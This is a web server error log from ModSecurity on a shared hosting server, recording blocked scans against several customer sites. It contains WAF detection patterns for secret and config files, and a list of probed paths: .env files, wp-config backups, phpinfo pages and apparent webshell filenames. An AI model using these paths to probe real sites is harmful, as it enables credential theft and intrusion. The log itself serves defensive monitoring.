[Tue May 26 13:47:43.075964 2026] [security2:error] [pid 555743:tid 555898] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1AAAASM"]
[Tue May 26 13:47:43.910909 2026] [security2:error] [pid 555743:tid 555966] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.env.old"] [unique_id "ahVXJ8jqAquC0YaxQjCk-QAAAWc"]
[Tue May 26 13:47:44.066207 2026] [security2:error] [pid 544395:tid 544480] [remote 51.91.98.45:36256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVXJxmrs7g3RMCdp8XuCgAAXlQ"]
[Tue May 26 13:47:44.328686 2026] [security2:error] [pid 555743:tid 555933] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKMjqAquC0YaxQjClBAAAAUY"]
[Tue May 26 13:47:44.407584 2026] [security2:error] [pid 555743:tid 555945] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJ8jqAquC0YaxQjCk_AAAAVI"]
[Tue May 26 13:47:44.903090 2026] [security2:error] [pid 555743:tid 555929] [client 79.51.36.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXKMjqAquC0YaxQjClDAAAAUI"]
[Tue May 26 13:47:45.313215 2026] [security2:error] [pid 555743:tid 555899] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKcjqAquC0YaxQjClGwAAASQ"]
[Tue May 26 13:47:45.613363 2026] [security2:error] [pid 555743:tid 555893] [client 129.222.147.134:59180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXKcjqAquC0YaxQjClJAAAAR4"]
[Tue May 26 13:47:45.613510 2026] [security2:error] [pid 555743:tid 555893] [client 129.222.147.134:59180] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXKcjqAquC0YaxQjClJAAAAR4"]
[Tue May 26 13:47:45.733315 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/crm/.env"] [unique_id "ahVXKcjqAquC0YaxQjClJgAAAWw"]
[Tue May 26 13:47:45.970816 2026] [security2:error] [pid 555743:tid 555937] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/local/.env"] [unique_id "ahVXKcjqAquC0YaxQjClMQAAAUo"]
[Tue May 26 13:47:46.144913 2026] [core:crit] [pid 555743:tid 555958] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:46.220201 2026] [security2:error] [pid 555743:tid 555921] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXKcjqAquC0YaxQjClKQAAATo"]
[Tue May 26 13:47:46.232977 2026] [security2:error] [pid 555743:tid 555934] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/core/.env"] [unique_id "ahVXKsjqAquC0YaxQjClPgAAAUc"]
[Tue May 26 13:47:46.459956 2026] [security2:error] [pid 555743:tid 555887] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/apps/.env"] [unique_id "ahVXKsjqAquC0YaxQjClQQAAARg"]
[Tue May 26 13:47:46.699881 2026] [security2:error] [pid 555743:tid 555895] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/application/.env"] [unique_id "ahVXKsjqAquC0YaxQjClRgAAASA"]
[Tue May 26 13:47:46.855140 2026] [security2:error] [pid 555743:tid 555926] [client 2.58.56.55:50443] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahVXKsjqAquC0YaxQjClSQAAAT8"], referer: www.google.com
[Tue May 26 13:47:46.883173 2026] [security2:error] [pid 555743:tid 555998] [client 2.58.56.55:51770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXKsjqAquC0YaxQjClSgAAAYc"], referer: www.google.com
[Tue May 26 13:47:46.906712 2026] [security2:error] [pid 544395:tid 544569] [client 2.58.56.55:50445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahVXKhmrs7g3RMCdp8XuLAAAACw"], referer: www.google.com
[Tue May 26 13:47:46.920568 2026] [security2:error] [pid 544395:tid 544541] [client 2.58.56.55:50444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVXKhmrs7g3RMCdp8XuLQAAABA"]
[Tue May 26 13:47:46.955166 2026] [security2:error] [pid 555743:tid 555978] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/web/.env"] [unique_id "ahVXKsjqAquC0YaxQjClTgAAAXM"]
[Tue May 26 13:47:47.086062 2026] [security2:error] [pid 555743:tid 555951] [client 2.58.56.55:51440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/gwltsqqt.php"] [unique_id "ahVXK8jqAquC0YaxQjClUwAAAVg"], referer: www.google.com
[Tue May 26 13:47:47.167854 2026] [security2:error] [pid 555743:tid 555890] [client 2.58.56.55:50443] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahVXK8jqAquC0YaxQjClVAAAARs"], referer: www.google.com
[Tue May 26 13:47:47.296651 2026] [security2:error] [pid 544395:tid 544528] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXKxmrs7g3RMCdp8XuMwAAAAM"]
[Tue May 26 13:47:47.360179 2026] [security2:error] [pid 555743:tid 555942] [client 2.58.56.55:50466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXK8jqAquC0YaxQjClWQAAAU8"], referer: www.google.com
[Tue May 26 13:47:47.398159 2026] [security2:error] [pid 555743:tid 555899] [client 20.206.67.134:4946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/gzxpaviw.php"] [unique_id "ahVXK8jqAquC0YaxQjClXgAAASQ"], referer: www.google.com
[Tue May 26 13:47:47.487447 2026] [security2:error] [pid 544395:tid 544651] [client 208.91.198.85:41796] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXKxmrs7g3RMCdp8XuNwAAAH4"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:47.536952 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:48148] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.soto-plumbing.com"] [uri "/wp-config.php.bak"] [unique_id "ahVXK8jqAquC0YaxQjClYgAAAWw"]
[Tue May 26 13:47:47.608478 2026] [security2:error] [pid 555743:tid 555905] [client 2.58.56.55:60863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahVXK8jqAquC0YaxQjClZAAAASo"], referer: www.google.com
[Tue May 26 13:47:47.676060 2026] [security2:error] [pid 555743:tid 555977] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXK8jqAquC0YaxQjClYQAAAXI"], referer: https://www.bloggertarget.com
[Tue May 26 13:47:47.684202 2026] [security2:error] [pid 555743:tid 555882] [client 20.206.67.134:4872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXK8jqAquC0YaxQjClZQAAARM"]
[Tue May 26 13:47:47.687904 2026] [security2:error] [pid 555743:tid 555976] [client 2.58.56.55:61389] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXK8jqAquC0YaxQjClZgAAAXE"]
[Tue May 26 13:47:48.329754 2026] [security2:error] [pid 544395:tid 544561] [client 45.148.10.159:48152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/info.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuTgAAACQ"]
[Tue May 26 13:47:48.544032 2026] [security2:error] [pid 544395:tid 544549] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuRwAAABg"]
[Tue May 26 13:47:48.682006 2026] [security2:error] [pid 555743:tid 555936] [client 4.201.75.230:5452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/about.php"] [unique_id "ahVXLMjqAquC0YaxQjClawAAAUk"]
[Tue May 26 13:47:48.990803 2026] [security2:error] [pid 544395:tid 544607] [client 2.58.56.55:52229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/inavbhkc.php"] [unique_id "ahVXLBmrs7g3RMCdp8XuVQAAAFI"], referer: www.google.com
[Tue May 26 13:47:48.997521 2026] [security2:error] [pid 555743:tid 555950] [client 2.58.56.55:54267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXLMjqAquC0YaxQjClbgAAAVc"]
[Tue May 26 13:47:49.033589 2026] [security2:error] [pid 544395:tid 544535] [client 45.148.10.159:48160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVXLRmrs7g3RMCdp8XuVgAAAAo"]
[Tue May 26 13:47:49.336230 2026] [security2:error] [pid 544395:tid 544614] [client 2.58.56.55:62046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVXLRmrs7g3RMCdp8XuYAAAAFk"]
[Tue May 26 13:47:49.731991 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLcjqAquC0YaxQjCldwAAAVU"]
[Tue May 26 13:47:49.942045 2026] [security2:error] [pid 544395:tid 544638] [client 2.58.56.55:56222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVXLRmrs7g3RMCdp8XuYwAAAHE"]
[Tue May 26 13:47:50.325283 2026] [security2:error] [pid 544395:tid 544498] [remote 74.7.241.58:45342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVXLhmrs7g3RMCdp8XuZAAAG2Y"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 13:47:50.348612 2026] [security2:error] [pid 544395:tid 544537] [client 74.7.175.183:33610] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.quickdeliveryexp.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVXLhmrs7g3RMCdp8XuZwAADE4"]
[Tue May 26 13:47:50.378244 2026] [security2:error] [pid 555743:tid 555906] [client 4.201.75.230:6114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/file.php"] [unique_id "ahVXLsjqAquC0YaxQjClhwAAASs"]
[Tue May 26 13:47:50.508038 2026] [security2:error] [pid 555743:tid 555912] [client 74.7.228.16:54706] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.quickdeliveryexp.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVXLsjqAquC0YaxQjCligABMVk"]
[Tue May 26 13:47:50.564537 2026] [security2:error] [pid 555743:tid 555968] [client 45.148.10.159:37338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/admin/server_info.php"] [unique_id "ahVXLsjqAquC0YaxQjCliwAAAWk"]
[Tue May 26 13:47:51.338152 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.159:37340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/server_info.php"] [unique_id "ahVXLxmrs7g3RMCdp8XudAAAAFs"]
[Tue May 26 13:47:51.861153 2026] [security2:error] [pid 555743:tid 555992] [client 89.124.114.167:24416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.114.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVXL8jqAquC0YaxQjClmQAAAYE"], referer: http://www.yourstorybag.com/blog/
[Tue May 26 13:47:52.061838 2026] [security2:error] [pid 544395:tid 544651] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXLxmrs7g3RMCdp8XuegAAAH4"]
[Tue May 26 13:47:52.067661 2026] [security2:error] [pid 555743:tid 555971] [client 45.148.10.159:37346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVXMMjqAquC0YaxQjCloAAAAWw"]
[Tue May 26 13:47:52.884095 2026] [security2:error] [pid 555743:tid 555883] [client 45.148.10.159:37360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/test.php"] [unique_id "ahVXMMjqAquC0YaxQjClsgAAARQ"]
[Tue May 26 13:47:53.020791 2026] [security2:error] [pid 555743:tid 555911] [client 106.192.248.115:60844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXMcjqAquC0YaxQjClugAAATA"]
[Tue May 26 13:47:53.021149 2026] [security2:error] [pid 555743:tid 555911] [client 106.192.248.115:60844] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXMcjqAquC0YaxQjClugAAATA"]
[Tue May 26 13:47:53.658057 2026] [security2:error] [pid 544395:tid 544636] [client 45.148.10.159:37372] ModSecurity: Access denied with code 406 (phase 2). Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "724"] [id "340114"] [rev "2"] [msg "Atomicorp.com WAF Rules: Apache admin service access attempt"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/server-info"] [unique_id "ahVXMRmrs7g3RMCdp8XukQAAAG8"]
[Tue May 26 13:47:53.890121 2026] [security2:error] [pid 555743:tid 555957] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXMcjqAquC0YaxQjClyAAAAV4"]
[Tue May 26 13:47:53.941827 2026] [security2:error] [pid 544395:tid 544538] [client 45.148.10.159:37372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.soto-plumbing.com"] [uri "/server-info.php"] [unique_id "ahVXMRmrs7g3RMCdp8XukwAAAA0"]
[Tue May 26 13:47:53.961337 2026] [security2:error] [pid 555743:tid 555898] [client 152.59.18.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVXMcjqAquC0YaxQjCl0QAAASM"], referer: https://www.ucdc.co.in/
[Tue May 26 13:47:54.303853 2026] [autoindex:error] [pid 555743:tid 555905] [client 152.59.18.132:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home
